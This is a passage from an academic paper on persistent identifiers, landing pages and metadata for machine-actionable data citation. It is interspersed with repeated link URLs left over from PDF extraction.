service endpoints. These are well-known Web addresses, or Uniform Resource Identifiers (URIs) (Berners-Lee, Fielding & Masinter, 1998; Jacobs & Walsh, 2004).5 5 URIs are very similar in concept to the more widely understood Uniform Resource Locators (URL, or “Web address”), but URIs do not specify the location of an object or service—they only identify it. URIs specify abstract resources on the Web. The associated server is responsible for resolving a URI to a specific physical resource—if the resource is resolvable. (URIs may also be used to identify physical things such as books in a library, which are not directly resolvable resources on the Web.) Starr et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.1 6/22 https://peerj.com/computer-science/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.w3.org http://www.w3.org http://www.w3.org http://www.w3.org http://www.w3.org http://www.w3.org http://www.w3.org http://www.w3.org http://www.w3.org http://www.w3.org http://www.w3.org http://www.w3.org http://www.w3.org http://www.w3.org http://www.w3.org http://www.w3.org http://www.w3.org http://dx.doi.org/10.7717/peerj-cs.1 RESTful Web services follow the REST (Representational State Transfer) architecture developed by Fielding and others (Fielding, 2000). They support a standard set of operations such as “get” (retrieve), “post” (create), and “put” (create or update) and are highly useful in building hypermedia applications by combining services from many programs distributed on various Web servers. Machine accessibility and particularly RESTful Web service accessibility is highly desirable because it enables construction of “Lego block” style programs built up from various service calls distributed across the Web, which need not be replicated locally. RESTful Web services are recommended over the other major Web service approach, SOAP interfaces (Gudgin et al., 2007), due to our focus on the documents being served and their content. REST also allows multiple data formats such as JSON (JavaScript Object Notation) (ECMA, 2013), and provides better support for mobile applications (e.g., caching, reduced bandwidth, etc.). Clearly, “machine accessibility” is also an underlying prerequisite to human accessibility, as browser (client) access to remote data is always mediated by machine-to-machine com- munication. But for flexibility in construction of new programs and services, it needs to be independently available apart from access to data generated from the direct browser calls. Unique identification Unique identification in a manner that is machine-resolvable on the Web and demon- strates a long-term commitment to persistence is fundamental to providing access to cited data and its associated metadata. There are several identifier schemes on the Web that meet these two criteria. The best identifiers for data citation in a particular community of practice will be those that meet these criteria and are widely used in that community. Our general recommendation, based on the JDDCP, is to use any currently available identifier scheme that is machine actionable, globally unique, and widely (and currently) used by a community, and that has demonstrated a long-term commitment to persistence. Best practice, given the preceding, is to choose a scheme that is also cross-discipline. Machine actionable in this context means resolvable on the Web by Web services. There are basically two kinds of identifier schemes available: (a) the native HTTP and HTTPS schemes where URIs are the identifiers and address resolution occurs natively; and (b) schemes requiring a resolving authority, like Digital Object Identifiers (DOIs). Resolving authorities reside at well-known web addresses. They issue and keep track of identifiers in their scheme and resolve them by translating them to URIs which are then natively resolved by the Web. For example, the DOI 10.1098/rsos.140216 when appended to the DOI resolver at http://doi.org, resolves to the URI http://rsos.royalsocietypublishing. org/content/1/3/140216. Similarly, the biosample identifier SAMEG120702, when ap- pended as (“biosample/SAMEG120702”) to the identifiers.org resolver at http://identifiers. org, resolves to the landing page www.ebi.ac.uk/biosamples/group/SAMEG120702. However resolved, a cited identifier should continue to resolve to an intermediary landing page (see below) even if the underlying data has been de-accessioned or is otherwise unavailable. Starr et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.1 7/22 https://peerj.com/computer-science/ http://doi.org http://doi.org http://doi.org http://doi.org http://doi.org http://doi.org http://doi.org http://doi.org http://doi.org http://doi.org http://doi.org http://doi.org http://doi.org http://doi.org http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://rsos.royalsocietypublishing.org/content/1/3/140216 http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://www.ebi.ac.uk/biosamples/group/SAMEG120702 http://www.ebi.ac.uk/biosamples/group/SAMEG120702 http://www.ebi.ac.uk/biosamples/group/SAMEG120702 http://www.ebi.ac.uk/biosamples/group/SAMEG120702 http://www.ebi.ac.uk/biosamples/group/SAMEG120702 http://www.ebi.ac.uk/biosamples/group/SAMEG120702 http://www.ebi.ac.uk/biosamples/group/SAMEG120702 http://www.ebi.ac.uk/biosamples/group/SAMEG120702 http://www.ebi.ac.uk/biosamples/group/SAMEG120702 http://www.ebi.ac.uk/biosamples/group/SAMEG120702 http://www.ebi.ac.uk/biosamples/group/SAMEG120702 http://www.ebi.ac.uk/biosamples/group/SAMEG120702 http://www.ebi.ac.uk/biosamples/group/SAMEG120702 http://www.ebi.ac.uk/biosamples/group/SAMEG120702 http://www.ebi.ac.uk/biosamples/group/SAMEG120702 http://www.ebi.ac.uk/biosamples/group/SAMEG120702 http://www.ebi.ac.uk/biosamples/group/SAMEG120702 http://www.ebi.ac.uk/biosamples/group/SAMEG120702 http://www.ebi.ac.uk/biosamples/group/SAMEG120702 http://www.ebi.ac.uk/biosamples/group/SAMEG120702 http://www.ebi.ac.uk/biosamples/group/SAMEG120702 http://www.ebi.ac.uk/biosamples/group/SAMEG120702 http://www.ebi.ac.uk/biosamples/group/SAMEG120702 http://www.ebi.ac.uk/biosamples/group/SAMEG120702 http://www.ebi.ac.uk/biosamples/group/SAMEG120702 http://www.ebi.ac.uk/biosamples/group/SAMEG120702 http://www.ebi.ac.uk/biosamples/group/SAMEG120702 http://www.ebi.ac.uk/biosamples/group/SAMEG120702 http://www.ebi.ac.uk/biosamples/group/SAMEG120702 http://www.ebi.ac.uk/biosamples/group/SAMEG120702 http://www.ebi.ac.uk/biosamples/group/SAMEG120702 http://www.ebi.ac.uk/biosamples/group/SAMEG120702 http://www.ebi.ac.uk/biosamples/group/SAMEG120702 http://www.ebi.ac.uk/biosamples/group/SAMEG120702 http://www.ebi.ac.uk/biosamples/group/SAMEG120702 http://www.ebi.ac.uk/biosamples/group/SAMEG120702 http://www.ebi.ac.uk/biosamples/group/SAMEG120702 http://www.ebi.ac.uk/biosamples/group/SAMEG120702 http://www.ebi.ac.uk/biosamples/group/SAMEG120702 http://www.ebi.ac.uk/biosamples/group/SAMEG120702 http://www.ebi.ac.uk/biosamples/group/SAMEG120702 http://www.ebi.ac.uk/biosamples/group/SAMEG120702 http://dx.doi.org/10.7717/peerj-cs.1 Table 1 Examples of identifier schemes meeting JDDCP criteria. Identifier scheme Full name Authority Resolution URI DataCite DOI (as URI) DataCite-assigned Digital Object Identifier DataCite http://dx.doi.org CrossRef DOI (as URI) CrossRef-assigned Digital Object Identifier CrossRef http://dx.doi.org Identifiers.org URI Identifiers.org-assigned Uniform Resource Identifier Identifiers.org http://identifiers.org HTTPS URI HTTP or HTTPS Uniform Resource Identifier Domain name owner n/a PURL Persistent Uniform Resource Locator Online Computer Library Center (OCLC) http://purl.org Handle (HDL) Handle System HDL Corporation for National Research Initiatives (CNRI) http://handle.net ARK Archival Resource Key Name Assigning or Mapping Authorities (various)a http://n2t.net; Name Mapping Authorities NBN National Bibliographic Number Various Various Notes. a Registries maintained at California Digital Library, Bibliothèque National de France and National Library of Medicine. By a commitment to persistence, we mean that (a) if a resolving authority is required that authority has demonstrated a reasonable chance to be present and functional in the future; (b) the owner of the domain or the resolving authority has made a credible commitment to ensure that its identifiers will always resolve. A useful survey of persistent identifier schemes appears in Hilse & Kothe (2006). Examples of identifier schemes meeting JDDCP criteria for robustly accessible data citation are shown in Table 1 and described below. This is not a comprehensive list and the criteria above should govern. Table 2 summarizes the approaches to achieving and enforcing persistence, and actions on object (data) removal from the archive, of each of the schemes. The subsections below briefly describe the exemplar identifier schemes shown in Tables 1 and 2. Digital Object Identifiers (DOIs) Digital Object Identifiers are an identification system originally developed by trade associations in the publishing industry for digital content over the Internet. They were developed in partnership with the Corporation for National Research Initiatives (CNRI), and built upon CNRI’s Handle System as an underlying network component. However, DOIs may identify digital objects of any type—certainly including data (International DOI Foundation, 2014). DOI syntax is defined as a US National Information Standards Organization standard, ANSI/NISO Z39.84-2010. DOIs may be expressed as URIs by prefixing the DOI with a resolution address: http://dx.doi.org/<doi>. DOI Registration Agencies provide services for registering DOIs along with descriptive metadata on the object being identified. The DOI system Proxy Server allows programmatic access to DOI name resolution using HTTP (International DOI Foundation, 2014). DataCite and CrossRef are the two DOI Registration Agencies of special relevance to data citation. They provide services for registering and resolving identifiers for cited data. Starr et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.1 8/22 https://peerj.com/computer-science/ http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://purl.org http://purl.org http://purl.org http://purl.org http://purl.org http://purl.org http://purl.org http://purl.org http://purl.org http://purl.org http://purl.org http://purl.org http://purl.org http://purl.org http://purl.org http://handle.net http://handle.net http://handle.net http://handle.net http://handle.net http://handle.net http://handle.net http://handle.net http://handle.net http://handle.net http://handle.net http://handle.net http://handle.net http://handle.net http://handle.net http://handle.net http://handle.net http://n2t.net http://n2t.net http://n2t.net http://n2t.net http://n2t.net http://n2t.net http://n2t.net http://n2t.net http://n2t.net http://n2t.net http://n2t.net http://n2t.net http://n2t.net http://n2t.net http://dx.doi.org/10.7717/peerj-cs.1 Table 2 Identifier scheme persistence and object removal behavior. Identifier scheme Achieving persistence Enforcing persistence Action on object removal DataCite DOI Registration with contracta Link checking DataCite contacts owners; metadata should persist CrossRef DOI Registration with contractb Link checking CrossRef contacts owners per policyc; metadata should persist Identifiers.org URI Registration Link checking Metadata should persist HTTPS URI Domain owner responsibility None Domain owner responsibility PURL URI Registration None Domain owner responsibility Handle (HDL) Registration None Identifier should persist ARK User-defined policies Hosting server Host-dependent; metadata should persistd NBN IETF RFC3188 Domain resolver Metadata should persist Notes. a The DataCite persistence contract language reads: “Objects assigned DOIs are stored and managed such that persistent access to them can be provided as appropriate and maintain all URLs associated with the DOI.” b The CrossRef persistence contract language reads in part: “Member must maintain each Digital Identifier assigned to it or for which it is otherwise responsible such that said Digital Identifier continuously resolves to a response page. . . containing no less than complete bibliographic information about the corresponding Original Work (including without limitation the Digital Identifier), visible on the initial page, with reasonably sufficient information detailing how the Original Work can be acquired and/or a hyperlink leading to the Original Works itself. . . ” c CrossRef identifier policy reads: “The . . . Member shall use the Digital Identifier as the permanent URL link to the Response Page. The. . . Member shall register the URL for the Response Page with CrossRef, shall keep it up-to-date and active, and shall promptly correct any errors or variances noted by CrossRef.” d For example, the French National Library has rigorous internal checks for the 20 million ARKs that it manages via its own resolver. Both require persistence commitments of their registrants and take active steps to monitor compliance. DataCite is specifically designed—as its name would indicate—to support data citation. A recent collaboration between the software archive GitHub, the Zenodo repository system at CERN, FigShare, and Mozilla Science Lab, now makes it possible to cite software, giving DOIs to GitHub-committed code (GitHub Guides, 2014). Handle System (HDLs) Handles are identifiers in a general-purpose global name service designed for securely resolving names over the Internet, compatible with but not requiring the Domain Name Service. Handles are location independent and persistent. The system was developed by Bob Kahn at the Corporation for National Research Initiatives, and currently supports, on average, 68 million resolution requests per month—the largest single user being the Digital Object Identifier (DOI) system. Handles can be expressed as URIs (CNRI, 2014; Dyson, 2003). Identifiers.org Uniform Resource Identifiers (URIs) Many common identifiers used in the life sciences, such as PubMed or Protein Data Bank IDs, are not natively Web-resolvable. Identifiers.org associates such database-dependent identifiers with persistent URIs and resolvable physical URLs. Identifiers.org was developed and is maintained at the European Bioinformatics Institute, and was built on top of the MIRIAM registry (Juty, Le Novére & Laibe, 2012). Identifiers.org URIs are constructed using the syntax http://identifiers.org/ <data resource name>/<native identifier>, where <data resource name> designates a particular database, and <native identifier> is the ID used within that database to retrieve the record. The Identifiers.org resolver supports multiple Starr et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.1 9/22 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.1 alternative locations (which may or may not be mirrors) for data it identifies. It supports programmatic access to data. PURLs PURLs are “Persistent Uniform Resource Locators”, a system originally developed by the Online Computer Library Center (OCLC). They act as intermediaries between potentially changing locations of digital resources, to which the PURL name resolves. PURLs are registered and resolved at http://purl.org, http://purl.access.gpo.gov, http:// purl.bioontology.org and various other resolvers. PURLs are implemented as an HTTP redirection service and depend on the survival of their host domain name (OCLC, 2015; Library of Congress, 1997). PURLs fail to resolve upon object removal. Handling this behavior through a metadata landing page (see below) is the responsibility of the owner of the cited object. HTTP URIs URIs (Uniform Resource Identifiers) are strings of characters used to identify resources. They are the identifier system for the Web. URIs begin with a scheme name, such as http or ftp or mailto, followed by a colon, and then a scheme-specific part. HTTP URIs will be quite familiar as they are typed every day into browser address bars, and begin with http:. Their scheme-specific part is next, beginning with “//”, followed by an identifier, which often but not always is resolvable to a specific resource on the Web. URIs by themselves have no mechanism for storing metadata about any objects to which they are supposed to resolve, nor do they have any particular associated persistence policy. However, other identifier schemes with such properties, such as DOIs, are often represented as URIs for convenience (Berners-Lee, Fielding & Masinter, 1998; Jacobs & Walsh, 2004). Like PURLs, native HTTP URIs fail to resolve upon object removal. Handling this behavior through a metadata landing page (see below) is the responsibility of the owner of the cited object. Archival Resource Key (ARKs) Archival Resource Keys are unique identifiers designed to support long-term persistence of information objects. An ARK is essentially a URL (Uniform Resource Locator) with some additional rules. For example, hostnames are excluded when comparing ARKs in order to prevent current hosting arrangements from affecting identity. The maintenance agency is the California Digital Library, which offers a hosted service for ARKs and DOIs (Kunze & Starr, 2006; Kunze, 2003; Kunze & Rodgers, 2013; Janée, Kunze & Starr, 2009). ARKs provide access to three things—an information object; related metadata; and the provider’s persistence commitment. ARKs propose inflections (changing the end of an identifier) as a way to retrieve machine-readable metadata without requiring (or prohibiting) content negotiation for linked data applications. Unlike, for example, DOIs, there are no fees to assign ARKs, which can be hosted on an organization’s own web server if desired. They are globally resolvable via the identifier-scheme-agnostic N2T (Name-To-Thing, http://n2t.net) resolver. The ARK registry is replicated at the California Starr et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.1 10/22 https://peerj.com/computer-science/ http://purl.org http://purl.org http://purl.org http://purl.org http://purl.org http://purl.org http://purl.org http://purl.org http://purl.org http://purl.org http://purl.org http://purl.org http://purl.org http://purl.org http://purl.org http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://n2t.net http://n2t.net http://n2t.net http://n2t.net http://n2t.net http://n2t.net http://n2t.net http://n2t.net http://n2t.net http://n2t.net http://n2t.net http://n2t.net http://n2t.net http://n2t.net http://dx.doi.org/10.7717/peerj-cs.1 Digital Library, the Bibliothéque Nationale de France, and the US National Library of Medicine (Kunze & Starr, 2006; Peyrard, Kunze & Tramoni, 2014; Kunze, 2012). National Bibliography Number (NBNs) National Bibliography Numbers are a set of related publication identifier systems with country-specific formats and resolvers, utilized by national library systems in some countries. They are used by, for example, Germany, Sweden, Finland and Italy, for publications in national archives without publisher-assigned identifiers such as ISBNs. There is a URN namespace for NBNs that includes the country code; expressed as a URN, NBNs become globally unique (Hakala, 2001; Moats, 1997). Landing pages The identifier included in a citation should point to a landing page or set of pages rather than to the data itself (Hourclé et al., 2012; Rans et al., 2013; Clark, Evans & Strollo, 2014). And the landing page should persist even if the data is no longer accessible. By “landing page(s)” we mean a set of information about the data via both structured metadata and unstructured text and other information. There are three main reasons to resolve identifiers to landing pages rather than directly to data. First, as proposed in the JDDCP, the metadata and the data may have different lifespans, the metadata potentially surviving the data. This is true because data storage imposes costs on the hosting organization. Just as printed volumes in a library may be de-accessioned from time to time, based on considerations of their value and timeliness, so will datasets. The JDDCP proposes that metadata, essentially cataloging information on the data, should still remain a citable part of the scholarly record even when the dataset may no longer be available. Second, the cited data may not be legally available to all, even when initially accessioned, for reasons of licensing or confidentiality (e.g. Protected Health Information). The landing page provides a method to host metadata even if the data is no longer present. And it also provides a convenient place where access credentials can be validated. Third, resolution to a landing page allows for an access point that is independent from any multiple encodings of the data that may be available. Landing pages should contain the following information. Items marked “conditional” are recommended if the conditions described are present, e.g., access controls are required to be implemented if required by licensing or PHI considerations; multiple versions are required to be described if they are available; etc. • (recommended) Dataset descriptions: The landing page must provide descriptions of the datasets available, and information on how to programmatically retrieve data where a user or device is so authorized. (See Dataset description for formats.) • (conditional) Versions: What versions of the data are available, if there is more than one version that may be accessed. • (optional) Explanatory or contextual information: Provide explanations, contextual guidance, caveats, and/or documentation for data use, as appropriate. Starr et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.1 11/22 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.1 • (conditional) Access controls: Access controls based on content licensing, Protected Health Information (PHI) status, Institutional Review Board (IRB) authorization, embargo, or other restrictions, should be implemented here if they are required. • (recommended) Persistence statement: Reference to a statement describing the data and metadata persistence policies of the repository should be provided at the landing page. Data persistence policies will vary by repository but should be clearly described. (See Persistence guarantee for recommended language). • (recommended) Licensing information: Information regarding licensing should be provided, with links to the relevant licensing or waiver documents as required (e.g., Creative Commons CC0 waiver description (https://creativecommons.org/ publicdomain/zero/1.0/), or other relevant material.) • (conditional) Data availability and disposition: The landing page should provide information on the availability of the data if it is restricted, or has been de-accessioned (i.e., removed from the archive). As stated in the JDDCP, metadata should persist beyond de-accessioning. • (optional) Tools/software: What tools and software may be associated or useful with the datasets, and how to obtain them (certain datasets are not readily usable without specific software). Content encoding on landing pages Landing pages should provide both human-readable and machine-readable content. • HTML; that is, the native browser-interpretable format used to generate a graphical and/or language-based display in a browser window, for human reading and under- standing. • At least one non-proprietary machine-readable format; that is, a content format with a fully specified syntax capable of being parsed by software without ambiguity, at a data element level. Options: XML, JSON/JSON-LD, RDF (Turtle, RDF-XML, N-Triples, N-Quads), microformats, microdata, RDFa. Best practices for dataset description Minimally the following metadata elements should be present in dataset descriptions: • Dataset Identifier: A machine-actionable identifier resolvable on the Web to the dataset. • Title: The title of the dataset. • Description: A description of the dataset, with more information than the title. • Creator: The person(s) and/or organizations who generated the dataset and are responsible for its integrity. • Publisher/Contact: The organization and/or contact who published the dataset and is responsible for its persistence. • PublicationDate/Year/ReleaseDate: ISO 8601 standard dates are preferred (Klyne & Newman, 2002). • Version: The dataset version identifier (if applicable). Starr et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.1 12/22 https://peerj.com/computer-science/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ http://dx.doi.org/10.7717/peerj-cs.1 Additional recommended metadata elements in dataset descriptions are: • Creator Identifier(s): ORCiD6 or other unique identifier of the individual creator(s).6 ORCiD IDs are numbers identifying individual researchers issued by a consortium of prominent academic publishers and others (Editors, 2010; Maunsell, 2014). • License: The license or waiver under which access to the content is provided (preferably a link to standard license/waiver text (e.g. https://creativecommons.org/publicdomain/ zero/1.0/). When multiple datasets are available on one landing page, licensing information may be grouped for all relevant datasets. A World Wide Web Consortium (http://www.w3.org) standard for machine-accessible dataset description on the Web is the W3C Data Catalog Vocabulary (DCAT, Mali, Erickson & Archer, 2014). It was developed at the Digital Enterprise Research Institute and later standardized by the W3C eGovernment Working Group, with broad participation, and underlies some other data interoperability models such as (DCAT Application Profile Working Group, 2013) and (Gray et al., 2014). The W3C Health Care and Life Sciences Dataset Description specification (Gray et al., 2014), currently in editor’s draft status, provides capability to add additional useful metadata beyond the DCAT vocabulary. This is an evolving standard that we suggest for provisional use. Data in the described datasets might also be described using other formats depending on the application area. Other possible approaches for dataset description include DataCite metadata (DataCite Metadata Working Group, 2014), Dublin Core (Dublin Core Metadata Initiative, 2012), the Data Documentation Initiative (DDI) (Data Documentation Initiative, 2012) for social sciences, or ISO19115 (ISO/TC 211, 2014) for Geographic information. Where any of these formats are used they should support at least the minimal set of recommended metadata elements described above. Serving the landing pages The URIs used as identifiers for citation should resolve to HTML landing pages with the appropriate metadata in a human readable form. To enable automated agents to extract the metadata these landing pages should include an HTML <link> element specifying a machine readable form of the page as an alternative. For those that are capable of doing so, we recommend also using Web Linking (Nottingham, 2010) to provide this information from all of the alternative formats. Should content management systems be developed specifically for maintaining and serving landing pages, we recommend both of these solutions plus the use of content negotiation (Holtzman & Mutz, 1998). A more detailed discussion of these techniques and our justification for using multiple solutions is included in the Appendix. Note that in all of these cases, the alternates are other forms of the landing page. Access to the data itself should be indicated through the DCAT fields accessURL or downloadURL as appropriate for the data. Data that is spread across multiple files can be indicated by linking to an ORE resource map (Lagoze & Van de Sompel, 2007). Starr et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.1 13/22 https://peerj.com/computer-science/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ 